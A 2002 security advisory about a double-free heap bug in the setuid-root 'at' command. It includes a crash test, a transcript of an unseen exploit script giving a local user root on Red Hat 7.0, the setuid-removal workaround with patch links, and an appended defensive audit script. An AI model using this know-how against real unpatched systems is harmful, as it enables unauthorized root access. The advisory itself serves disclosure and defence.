17th Jan 2002 [SBWID-5007]
COMMAND
at heap overflow may lead to root access
SYSTEMS AFFECTED
at before 3.1.8
PROBLEM
Zen-parse reported:
The 'at' command reads commands from standard input for execution at
a later time specified on the command line. If such an execution time
is given in a carefully drafted (but wrong) format, the at command may
crash as a result of a surplus call to free(). The cause of the crash
is a heap corruption that is exploitable under certain circumstances
since the /usr/bin/at command is installed setuid root.
To check if you are potentially vulnerable to this exploit, execute:
/usr/bin/at 31337 + vuln. If you are vulnerable this will cause:
"Segmentation fault"; if not, there will be a message similar to:
"Garbled time" (possibly with some extra information). The problem is
caused by a bug in the parser which deallocates the same memory
location twice. This can sometimes be exploited, for the uid of
"daemon", and due to some other minor problems, may allow root access
from there.
Attached is an exploit for Redhat 7.0.
bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net,
it may be redistributed without modification. 2) In any other case the
contents of this message is confidential and not to be distributed in
any form without express permission from the author. This document may
contain Unclassified Controlled Nuclear Information.
SOLUTION
A temporary workaround against the bug is to disable the at command for
non-root users by removing the setuid-bit from the /usr/bin/at command.
Patches are available from the various integrators.
http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.dsc
http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.diff.gz
http://security.debian.org/dists/stable/updates/main/source/at_3.1.8.orig.tar.gz
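The temporary workaround above can be checked and applied with a short script. This is an added example, not part of the original advisory; the function names and the AT_BIN and APPLY variables are assumptions of the example.

```shell
#!/bin/sh
# Added example: check and apply the advisory's temporary workaround.
# AT_BIN and APPLY are variables assumed by this example.

# Print "missing", "setuid" or "not-setuid" for the file at $1.
setuid_status() {
    if [ ! -e "$1" ]; then
        echo "missing"
    elif [ -u "$1" ]; then
        echo "setuid"
    else
        echo "not-setuid"
    fi
}

# Clear the setuid bit on $1 and confirm the result.
# Returns 0 only if the file exists and no longer carries the bit.
strip_setuid() {
    [ -e "$1" ] || return 1
    chmod u-s "$1" || return 1
    [ "$(setuid_status "$1")" = "not-setuid" ]
}

# Report on $1; with APPLY=1, also apply the workaround.
# Prints the final status so callers can log or compare it.
audit_at() {
    bin=$1
    state=$(setuid_status "$bin")
    if [ "$state" = "setuid" ] && [ "${APPLY:-0}" = "1" ]; then
        # Show the permissions before the change so they can be
        # restored once a patched package is installed.
        ls -ld "$bin" >&2
        strip_setuid "$bin" || { echo "failed"; return 1; }
        state="not-setuid"
    fi
    echo "$state"
}

# Report-only by default; run as root with APPLY=1 to change the file.
audit_at "${AT_BIN:-/usr/bin/at}"
```

With the bit removed, only root can submit jobs through at until a patched package is installed and the original mode is restored.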